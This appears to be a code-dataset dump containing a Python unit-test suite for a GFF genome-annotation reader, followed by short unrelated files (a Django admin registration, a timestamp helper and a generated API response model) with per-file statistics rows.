        "scaffold00080\tmaker\texon\t145928\t146176\t67.378\t+\t.\tID=BDOR_007866-RB:exon:7;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tfive_prime_UTR\t145206\t145282\t.\t+\t.\tID=BDOR_007866-RB:UTR1;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tfive_prime_UTR\t145607\t145865\t.\t+\t.\tID=BDOR_007866-RB:UTR2;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tfive_prime_UTR\t145928\t146176\t.\t+\t.\tID=BDOR_007866-RB:UTR3;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tfive_prime_UTR\t154498\t154575\t.\t+\t.\tID=BDOR_007866-RB:UTR4;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tCDS\t154576\t154620\t.\t+\t0\tID=BDOR_007866-RB:cds:5;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tCDS\t179210\t179419\t.\t+\t0\tID=BDOR_007866-RB:cds:6;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tCDS\t179489\t179691\t.\t+\t0\tID=BDOR_007866-RB:cds:7;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tthree_prime_UTR\t183025\t183302\t.\t+\t.\tID=BDOR_007866-RB:UTR5;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\tstop_codon\t183022\t183024\t.\t+\t.\tID=BDOR_007866-RB:stop2;Parent=BDOR_007866-RB\n",
    ]
    return "".join(lines)
# noinspection PyPep8
def get_out_of_order_text():
    """Return a GFF sample where two mRNAs are declared before either one's children.

    Both mRNAs (-RA and -RB) belong to gene BDOR_007864; the -RB child
    features appear after all -RA children, exercising out-of-order parsing.
    """
    # A single join avoids the repeated string-concatenation of the old += chain.
    lines = [
        "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n",
        "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n",
        "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RB;Parent=BDOR_007864\n",
        "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RB\n",
    ]
    return "".join(lines)
# noinspection PyPep8
def get_out_of_order_text_with_missing_parent():
    """Return a GFF sample whose trailing features reference an undeclared mRNA.

    Only mRNA -RA is declared, but the last six features claim
    Parent=BDOR_007864-RB; used to verify the reader does not loop forever
    waiting for a parent that never appears.
    """
    # A single join avoids the repeated string-concatenation of the old += chain.
    lines = [
        "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n",
        "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n",
        "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RB\n",
        "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RB\n",
    ]
    return "".join(lines)
# noinspection PyPep8
def get_annotated_gff():
    """Return a minus-strand annotated GFF sample whose mRNA carries one Dbxref entry."""
    # A single join avoids the repeated string-concatenation of the old += chain.
    lines = [
        "Scaffold1\tI5K\tgene\t133721\t162851\t.\t-\t.\tID=AGLA000002;Name=AglaTmpM000002;\n",
        "Scaffold1\tI5K\tmRNA\t133721\t162851\t.\t-\t.\tID=AGLA000002-RA;Name=AglaTmpM000002-RA;Parent=AGLA000002;Dbxref=PRINTS:PR00075;\n",
        "Scaffold1\tI5K\texon\t133721\t135519\t.\t-\t.\tID=AGLA000002-RA-EXON01;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t140163\t140635\t.\t-\t.\tID=AGLA000002-RA-EXON02;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t147266\t147396\t.\t-\t.\tID=AGLA000002-RA-EXON03;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t152757\t152979\t.\t-\t.\tID=AGLA000002-RA-EXON04;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t162720\t162762\t.\t-\t.\tID=AGLA000002-RA-EXON05;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t162825\t162851\t.\t-\t.\tID=AGLA000002-RA-EXON06;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t140426\t140635\t.\t-\t0\tID=AGLA000002-RA-CDS01;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t147266\t147396\t.\t-\t2\tID=AGLA000002-RA-CDS02;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t152757\t152976\t.\t-\t0\tID=AGLA000002-RA-CDS03;Parent=AGLA000002-RA;\n",
    ]
    return "".join(lines)
# noinspection PyPep8
def get_annotated_gff_multi_dbxref():
    """Return the annotated GFF sample with two comma-separated values in one Dbxref attribute."""
    # A single join avoids the repeated string-concatenation of the old += chain.
    lines = [
        "Scaffold1\tI5K\tgene\t133721\t162851\t.\t-\t.\tID=AGLA000002;Name=AglaTmpM000002;\n",
        "Scaffold1\tI5K\tmRNA\t133721\t162851\t.\t-\t.\tID=AGLA000002-RA;Name=AglaTmpM000002-RA;Parent=AGLA000002;Dbxref=PRINTS:PR00075,PFAM:foo;\n",
        "Scaffold1\tI5K\texon\t133721\t135519\t.\t-\t.\tID=AGLA000002-RA-EXON01;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t140163\t140635\t.\t-\t.\tID=AGLA000002-RA-EXON02;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t147266\t147396\t.\t-\t.\tID=AGLA000002-RA-EXON03;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t152757\t152979\t.\t-\t.\tID=AGLA000002-RA-EXON04;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t162720\t162762\t.\t-\t.\tID=AGLA000002-RA-EXON05;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t162825\t162851\t.\t-\t.\tID=AGLA000002-RA-EXON06;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t140426\t140635\t.\t-\t0\tID=AGLA000002-RA-CDS01;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t147266\t147396\t.\t-\t2\tID=AGLA000002-RA-CDS02;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t152757\t152976\t.\t-\t0\tID=AGLA000002-RA-CDS03;Parent=AGLA000002-RA;\n",
    ]
    return "".join(lines)
# noinspection PyPep8
def get_annotated_gff_multi_dbxref_repeated_anno():
    """Return the annotated GFF sample where the mRNA repeats the Dbxref attribute twice."""
    # A single join avoids the repeated string-concatenation of the old += chain.
    lines = [
        "Scaffold1\tI5K\tgene\t133721\t162851\t.\t-\t.\tID=AGLA000002;Name=AglaTmpM000002;\n",
        "Scaffold1\tI5K\tmRNA\t133721\t162851\t.\t-\t.\tID=AGLA000002-RA;Name=AglaTmpM000002-RA;Parent=AGLA000002;Dbxref=PRINTS:PR00075;Dbxref=PFAM:foo;\n",
        "Scaffold1\tI5K\texon\t133721\t135519\t.\t-\t.\tID=AGLA000002-RA-EXON01;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t140163\t140635\t.\t-\t.\tID=AGLA000002-RA-EXON02;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t147266\t147396\t.\t-\t.\tID=AGLA000002-RA-EXON03;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t152757\t152979\t.\t-\t.\tID=AGLA000002-RA-EXON04;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t162720\t162762\t.\t-\t.\tID=AGLA000002-RA-EXON05;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\texon\t162825\t162851\t.\t-\t.\tID=AGLA000002-RA-EXON06;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t140426\t140635\t.\t-\t0\tID=AGLA000002-RA-CDS01;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t147266\t147396\t.\t-\t2\tID=AGLA000002-RA-CDS02;Parent=AGLA000002-RA;\n",
        "Scaffold1\tI5K\tCDS\t152757\t152976\t.\t-\t0\tID=AGLA000002-RA-CDS03;Parent=AGLA000002-RA;\n",
    ]
    return "".join(lines)
class TestGFFReader(unittest.TestCase):
    """Unit tests for GFFReader: line validation, field extraction and whole-file parsing."""

    def setUp(self):
        self.reader = GFFReader()

    def tearDown(self):
        # Remove extra files created by GFFReader. Each removal gets its own
        # try-block: the original single try aborted on the first missing
        # file and left the remaining files behind.
        for leftover in ("genome.comments.gff", "genome.invalid.gff", "genome.ignored.gff"):
            try:
                os.remove(leftover)
            except OSError:
                pass

    def test_validate_line_not_enough_fields(self):
        badline = "scaffold00080\tmaker\tgene\t106151\t109853\t+\t.\tID=BDOR_007864\n"
        self.assertFalse(self.reader.validate_line(badline))

    def test_validate_line_no_id(self):
        badline = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tName=BDOR_007864\n"
        self.assertFalse(self.reader.validate_line(badline))

    def test_validate_line_indices_out_of_order(self):
        badline = "scaffold00080\tmaker\tgene\t109853\t106151\t.\t+\t.\tID=BDOR_007864;Name=BDOR_007864\n"
        self.assertFalse(self.reader.validate_line(badline))

    def test_validate_line(self):
        goodline = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n"
        self.assertTrue(self.reader.validate_line(goodline))

    def test_line_type_gene(self):
        line = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n".split('\t')
        self.assertEqual('gene', self.reader.line_type(line))

    def test_line_type_mrna(self):
        line = "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n".split('\t')
        self.assertEqual('mRNA', self.reader.line_type(line))

    # noinspection PyPep8
    def test_line_type_exon(self):
        line = "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n".split('\t')
        self.assertEqual('exon', self.reader.line_type(line))

    # noinspection PyPep8
    def test_line_type_cds(self):
        line = "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n".split('\t')
        self.assertEqual('CDS', self.reader.line_type(line))

    # noinspection PyPep8
    def test_line_type_start_codon(self):
        line = "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n".split('\t')
        self.assertEqual('start_codon', self.reader.line_type(line))

    # noinspection PyPep8
    def test_line_type_stop_codon(self):
        line = "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n".split('\t')
        self.assertEqual('stop_codon', self.reader.line_type(line))

    def test_parse_attributes(self):
        attr = "ID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n"
        parsed = self.reader.parse_attributes(attr)
        self.assertEqual('BDOR_007864-RA:stop2', parsed['identifier'])
        self.assertEqual('BDOR_007864-RA', parsed['parent_id'])

    def test_parse_attributes_with_name(self):
        attr = "ID=BDOR_007864-RA:stop2;Name=BDOR_007864-RA;Parent=BDOR_007864-RA\n"
        parsed = self.reader.parse_attributes(attr)
        self.assertEqual('BDOR_007864-RA:stop2', parsed['identifier'])
        self.assertEqual('BDOR_007864-RA', parsed['parent_id'])
        self.assertEqual('BDOR_007864-RA', parsed['name'])

    # noinspection PyPep8
    def test_extract_cds_args(self):
        line = "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n".split('\t')
        args = self.reader.extract_cds_args(line)
        expected = {'indices': [106151, 106451], 'strand': '+', 'phase': 0, 'identifier': 'BDOR_007864-RA:cds:0', 'parent_id': 'BDOR_007864-RA'}
        self.assertEqual(expected, args)

    # noinspection PyPep8
    def test_extract_exon_args(self):
        line = "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n".split('\t')
        expected = {'indices': [106151, 106451], 'score': 0.9, 'strand': '+', 'identifier': 'BDOR_007864-RA:exon:0', 'parent_id': 'BDOR_007864-RA'}
        args = self.reader.extract_exon_args(line)
        self.assertEqual(expected, args)

    # noinspection PyPep8
    def test_extract_mrna_args(self):
        line = "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n".split('\t')
        expected = {'indices': [106151, 109853], 'identifier': 'BDOR_007864-RA', 'strand': '+', 'parent_id': 'BDOR_007864',
                    'seq_name': "scaffold00080", 'source': "maker"}
        args = self.reader.extract_mrna_args(line)
        self.assertEqual(expected, args)

    def test_extract_gene_args(self):
        line = "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n".split('\t')
        expected = {'seq_name': 'scaffold00080', 'source': 'maker', 'indices': [106151, 109853],
                    'strand': '+', 'identifier': 'BDOR_007864'}
        args = self.reader.extract_gene_args(line)
        self.assertEqual(expected, args)

    # noinspection PyPep8
    def test_extract_other_feature_args(self):
        line = "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n".split('\t')
        expected = {'feature_type': 'start_codon', 'indices': [106151, 106153],
                    'identifier': 'BDOR_007864-RA:start1', 'parent_id': 'BDOR_007864-RA'}
        args = self.reader.extract_other_feature_args(line)
        self.assertEqual(expected, args)

    # noinspection PyPep8
    def test_update_cds(self):
        current_cds = Mock()
        line = "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RA\n".split('\t')
        self.reader.update_cds(line, current_cds)
        current_cds.add_indices.assert_called_with([106509, 106749])
        current_cds.add_phase.assert_called_with(2)
        current_cds.add_identifier.assert_called_with('BDOR_007864-RA:cds:1')

    # noinspection PyPep8
    def test_update_exon(self):
        current_exon = Mock()
        line = "scaffold00080\tmaker\texon\t106509\t106749\t8.34\t+\t2\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RA\n".split('\t')
        self.reader.update_exon(line, current_exon)
        current_exon.add_indices.assert_called_with([106509, 106749])
        current_exon.add_identifier.assert_called_with('BDOR_007864-RA:exon:1')

    def test_read_file(self):
        # NOTE(review): io.BytesIO over a str works on Python 2 only; under
        # Python 3 this would need io.StringIO or bytes input -- confirm the
        # target interpreter before changing it.
        text = get_sample_text()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertEqual(2, len(genes))
        self.assertEqual('BDOR_007864-RA', genes[0].mrnas[0].identifier)
        self.assertEqual([179489, 179691], genes[1].mrnas[0].cds.indices[2])

    def test_read_file_out_of_order(self):
        text = get_out_of_order_text()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertEqual(1, len(genes))
        self.assertEqual('BDOR_007864-RA', genes[0].mrnas[0].identifier)
        self.assertEqual(2, len(genes[0].mrnas))
        self.assertEqual(2, len(genes[0].mrnas[0].exon.indices))
        self.assertEqual(2, len(genes[0].mrnas[1].exon.indices))

    def test_read_file_doesnt_loop_infinitely_when_feature_with_no_parent_mrna(self):
        text = get_out_of_order_text_with_missing_parent()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertEqual(1, len(genes))

    def test_read_file_annotated(self):
        text = get_annotated_gff()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertEqual(1, len(genes))
        self.assertEqual({"Dbxref": ["PRINTS:PR00075"]}, genes[0].mrnas[0].annotations)

    def test_read_file_annotated_multi_dbxref(self):
        text = get_annotated_gff_multi_dbxref()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertEqual(1, len(genes))
        self.assertEqual({"Dbxref": ["PRINTS:PR00075", "PFAM:foo"]}, genes[0].mrnas[0].annotations)

    def test_read_file_annotated_multi_dbxref_repeated_anno(self):
        text = get_annotated_gff_multi_dbxref_repeated_anno()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertEqual(1, len(genes))
        self.assertEqual({"Dbxref": ["PRINTS:PR00075", "PFAM:foo"]}, genes[0].mrnas[0].annotations)

    def test_CDS_knows_its_strand(self):
        text = get_annotated_gff()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertTrue(genes[0].mrnas[0].cds)
        self.assertEqual('-', genes[0].mrnas[0].cds.strand)

    def test_exon_knows_its_strand(self):
        text = get_annotated_gff()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertTrue(genes[0].mrnas[0].exon)
        self.assertEqual('-', genes[0].mrnas[0].exon.strand)

    def test_mrna_knows_its_strand(self):
        text = get_annotated_gff()
        inbuff = io.BytesIO(text)
        genes, comments, invalids, ignored = self.reader.read_file(inbuff)
        self.assertTrue(genes[0].mrnas[0])
        self.assertEqual('-', genes[0].mrnas[0].strand)

    def test_delete_name_if_name_and_id_are_equivalent(self):
        attr = "ID=BDOR_007864;Name=BDOR_007864\n"
        parsed = self.reader.parse_attributes(attr)
        self.assertEqual('BDOR_007864', parsed['identifier'])
        self.assertTrue('name' not in parsed)
def suite():
    """Build and return a TestSuite containing every TestGFFReader test."""
    _suite = unittest.TestSuite()
    # unittest.makeSuite is deprecated (removed in Python 3.13); the loader
    # API is the supported way to collect tests from a TestCase class.
    _suite.addTest(unittest.defaultTestLoader.loadTestsFromTestCase(TestGFFReader))
    return _suite
if __name__ == '__main__':
    # Allow running this test module directly (e.g. `python gff_reader_tests.py`).
    unittest.main()
| 61.713855
| 161
| 0.719606
| 3,026
| 20,489
| 4.711831
| 0.07766
| 0.022303
| 0.07743
| 0.024407
| 0.874386
| 0.849278
| 0.825572
| 0.786155
| 0.75789
| 0.728433
| 0
| 0.184416
| 0.118698
| 20,489
| 331
| 162
| 61.900302
| 0.605195
| 0.019181
| 0
| 0.482759
| 0
| 0.386973
| 0.536285
| 0.499178
| 0
| 0
| 0
| 0
| 0.183908
| 1
| 0.145594
| false
| 0.003831
| 0.019157
| 0
| 0.195402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba13c09da7e295bf670c694305cf94d404d55d81
| 162
|
py
|
Python
|
checkin/checkin/admin.py
|
peitaosu/100CheckIn
|
1251252e635f01435090bfe34669d52d7a40ffd6
|
[
"MIT"
] | null | null | null |
checkin/checkin/admin.py
|
peitaosu/100CheckIn
|
1251252e635f01435090bfe34669d52d7a40ffd6
|
[
"MIT"
] | null | null | null |
checkin/checkin/admin.py
|
peitaosu/100CheckIn
|
1251252e635f01435090bfe34669d52d7a40ffd6
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import User, Event, User_Event
# Expose each check-in model in the Django admin interface.
for model in (User, Event, User_Event):
    admin.site.register(model)
| 27
| 43
| 0.820988
| 25
| 162
| 5.24
| 0.4
| 0.206107
| 0.389313
| 0.335878
| 0.396947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080247
| 162
| 6
| 44
| 27
| 0.879195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ba171f8a8ed2e349bc0a827d827d4133b12f654f
| 142
|
py
|
Python
|
app/utils.py
|
NoSugarCoffee/D-C
|
d8c675dac8459ae86a146d95ea6eb23bd8e7920d
|
[
"MIT"
] | null | null | null |
app/utils.py
|
NoSugarCoffee/D-C
|
d8c675dac8459ae86a146d95ea6eb23bd8e7920d
|
[
"MIT"
] | 5
|
2022-01-31T14:52:16.000Z
|
2022-02-19T16:35:14.000Z
|
app/utils.py
|
NoSugarCoffee/sweet_backend
|
d8c675dac8459ae86a146d95ea6eb23bd8e7920d
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timezone, timedelta
def get_current_timestamp_CST():
    """Return the current time as a timezone-aware datetime in CST (UTC+8)."""
    cst = timezone(timedelta(hours=8))
    return datetime.now(tz=cst)
| 28.4
| 56
| 0.795775
| 19
| 142
| 5.789474
| 0.789474
| 0.309091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.105634
| 142
| 5
| 56
| 28.4
| 0.858268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
e83f07c3bad83830a78753a50a8813c75ed87df7
| 40,583
|
py
|
Python
|
incident_io_client/models/incidents_list_response_body.py
|
expobrain/python-incidentio-client
|
be15e0370dc3feb979e448f87b40906d12331467
|
[
"MIT"
] | null | null | null |
incident_io_client/models/incidents_list_response_body.py
|
expobrain/python-incidentio-client
|
be15e0370dc3feb979e448f87b40906d12331467
|
[
"MIT"
] | null | null | null |
incident_io_client/models/incidents_list_response_body.py
|
expobrain/python-incidentio-client
|
be15e0370dc3feb979e448f87b40906d12331467
|
[
"MIT"
] | null | null | null |
from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.incident_response_body import IncidentResponseBody
from ..models.pagination_meta_response_body import PaginationMetaResponseBody
from ..types import UNSET, Unset
T = TypeVar("T", bound="IncidentsListResponseBody")
@attr.s(auto_attribs=True)
class IncidentsListResponseBody:
    """Response body for the incidents list endpoint.

    Attributes:
        incidents (List[IncidentResponseBody]): The incidents returned for the
            current page of results.
        pagination_meta (Union[Unset, PaginationMetaResponseBody]): Cursor
            pagination details for the listing, e.g.
            {'after': '01FCNDV6P870EA6S7TK1DSYDG0', 'page_size': 25,
            'total_record_count': 238}. Omitted from serialization when unset.
    """

    incidents: List[IncidentResponseBody]
    pagination_meta: Union[Unset, PaginationMetaResponseBody] = UNSET
    # Holds any keys from the source payload that are not declared attributes.
    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)

    def to_dict(self) -> Dict[str, Any]:
        """Serialize this model to a plain dict, omitting unset optional fields."""
        serialized_incidents = [item.to_dict() for item in self.incidents]

        serialized_meta: Union[Unset, Dict[str, Any]] = UNSET
        if not isinstance(self.pagination_meta, Unset):
            serialized_meta = self.pagination_meta.to_dict()

        # Extra properties first; declared fields take precedence on key clash.
        field_dict: Dict[str, Any] = dict(self.additional_properties)
        field_dict["incidents"] = serialized_incidents
        if serialized_meta is not UNSET:
            field_dict["pagination_meta"] = serialized_meta
        return field_dict

    @classmethod
    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
        """Build an instance from a plain dict.

        Keys not consumed by the declared attributes are preserved in
        ``additional_properties``. The input dict is not mutated.
        """
        remaining = src_dict.copy()

        incidents = [
            IncidentResponseBody.from_dict(item)
            for item in remaining.pop("incidents")
        ]

        raw_meta = remaining.pop("pagination_meta", UNSET)
        pagination_meta: Union[Unset, PaginationMetaResponseBody]
        if isinstance(raw_meta, Unset):
            pagination_meta = UNSET
        else:
            pagination_meta = PaginationMetaResponseBody.from_dict(raw_meta)

        model = cls(
            incidents=incidents,
            pagination_meta=pagination_meta,
        )
        model.additional_properties = remaining
        return model

    @property
    def additional_keys(self) -> List[str]:
        """Names of the extra (undeclared) properties carried by this model."""
        return list(self.additional_properties.keys())

    def __getitem__(self, key: str) -> Any:
        return self.additional_properties[key]

    def __setitem__(self, key: str, value: Any) -> None:
        self.additional_properties[key] = value

    def __delitem__(self, key: str) -> None:
        del self.additional_properties[key]

    def __contains__(self, key: str) -> bool:
        return key in self.additional_properties
| 98.502427
| 124
| 0.640342
| 4,311
| 40,583
| 5.847135
| 0.049177
| 0.283255
| 0.051573
| 0.154719
| 0.947475
| 0.936327
| 0.927441
| 0.927441
| 0.927441
| 0.92268
| 0
| 0.127549
| 0.18185
| 40,583
| 411
| 125
| 98.742092
| 0.63163
| 0.901387
| 0
| 0.066667
| 0
| 0
| 0.027591
| 0.009321
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116667
| false
| 0
| 0.083333
| 0.05
| 0.35
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e8a4eddbe3c546ac1c73d612e5405b4d9bd45a2f
| 172
|
py
|
Python
|
tests/test_myapp/test_dependencies_container.py
|
BasicWolf/hexagonal-architecture-django
|
3bfa4ea2f258ba038c6e3cf73bcdae0511b6fcb6
|
[
"MIT"
] | 15
|
2021-05-31T12:56:53.000Z
|
2022-02-06T11:44:40.000Z
|
tests/test_myapp/test_dependencies_container.py
|
BasicWolf/hexagonal-architecture-django
|
3bfa4ea2f258ba038c6e3cf73bcdae0511b6fcb6
|
[
"MIT"
] | 6
|
2021-06-08T17:29:47.000Z
|
2022-03-30T09:41:06.000Z
|
